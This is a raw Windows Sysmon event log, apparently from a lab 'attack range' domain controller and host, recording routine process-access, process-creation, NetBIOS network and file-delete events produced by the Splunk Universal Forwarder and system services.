10341000x8000000000000000218021Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:19.018{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218020Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:19.018{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218019Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:19.018{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218018Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:19.018{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218017Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:19.018{2E1864BB-E13C-6299-0500-000000005F02}416536C:\Windows\system32\csrss.exe{2E1864BB-191B-629A-3147-000000005F02}5828C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000218016Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:19.018{2E1864BB-E1BD-6299-A700-000000005F02}47004496C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2E1864BB-191B-629A-3147-000000005F02}5828C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000218015Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:19.013{2E1864BB-191B-629A-3147-000000005F02}5828C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.2.5Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2E1864BB-E13C-6299-E703-000000000000}0x3e70SystemMD5=92BD3C71158FA8B9A0821D43564A56E7,SHA256=7850C91F8D08679D7A0579D350C08CA6F6EDEA8A12226ADC2E30B4ABF8CE0BE2,IMPHASH=FD2D4472615B421BAEF1D51F46EF5F52{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000044956Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:19.675{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56185B787FEFAC292AB2270FB5F7CBA0,SHA256=D86FF507021FC6008952EAA0F144BDC1541ED08AFFEB977B6E62A92F5FF0BF85,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000218042Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:20.769{2E1864BB-E1BE-6299-AB00-000000005F02}92876C:\Windows\system32\conhost.exe{2E1864BB-191C-629A-3347-000000005F02}7692C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218041Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:20.769{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218040Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:20.769{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218039Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:20.769{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218038Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:20.769{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218037Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:20.769{2E1864BB-E13C-6299-0500-000000005F02}416536C:\Windows\system32\csrss.exe{2E1864BB-191C-629A-3347-000000005F02}7692C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000218036Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:20.769{2E1864BB-E1BD-6299-A700-000000005F02}47004496C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2E1864BB-191C-629A-3347-000000005F02}7692C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000218035Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:20.770{2E1864BB-191C-629A-3347-000000005F02}7692C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2E1864BB-E13C-6299-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000218034Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:19.149{2E1864BB-E13A-6299-0100-000000005F02}4SystemNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.255ip-10-0-1-255.eu-central-1.compute.internal138netbios-dgmfalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local138netbios-dgm 354300x8000000000000000218033Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:19.149{2E1864BB-E13A-6299-0100-000000005F02}4SystemNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local138netbios-dgmfalse10.0.1.255ip-10-0-1-255.eu-central-1.compute.internal138netbios-dgm 10341000x8000000000000000218032Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:20.344{2E1864BB-191B-629A-3247-000000005F02}42885988C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000044958Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:20.768{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0A9933F58C4507847F39765EA02895D,SHA256=8F1E7FB6C10855ADABF043217C94BB3324FBFC5782D61A80454195257663653B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044957Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:20.628{0A5DF930-E3BE-6299-9D00-000000006002}2084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=0C10887AD2CB2365533428EF523D8972,SHA256=A36844EEBDF38A7550823481AAF3E2DCE89D281522383D9D85FF1B80E114D307,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000218051Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:21.800{2E1864BB-E1BE-6299-AB00-000000005F02}92876C:\Windows\system32\conhost.exe{2E1864BB-191D-629A-3447-000000005F02}6156C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218050Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:21.800{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218049Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:21.800{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218048Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:21.800{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218047Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:21.800{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218046Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:21.800{2E1864BB-E13C-6299-0500-000000005F02}416432C:\Windows\system32\csrss.exe{2E1864BB-191D-629A-3447-000000005F02}6156C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000218045Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:21.800{2E1864BB-E1BD-6299-A700-000000005F02}47004496C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2E1864BB-191D-629A-3447-000000005F02}6156C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000218044Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:21.801{2E1864BB-191D-629A-3447-000000005F02}6156C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.2.5Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2E1864BB-E13C-6299-E703-000000000000}0x3e70SystemMD5=C8BED8D054FDE4C4222F39C750539874,SHA256=765D1E768D7027343C681DF3B2F6113ED0337F7179CDAE9CF89979A8725CE490,IMPHASH=5DCBAD7446F97D73DA1DA121D8CD8778{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000218043Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:21.069{2E1864BB-191C-629A-3347-000000005F02}76927860C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000044959Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:21.862{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1733A8C08B858E0A71C7325B4D190CD5,SHA256=38B0AD0B50FD6C0D160DD0958E0C57297C0F32ED6684D31D85573110D9805478,IMPHASH=00000000000000000000000000000000falsetrue 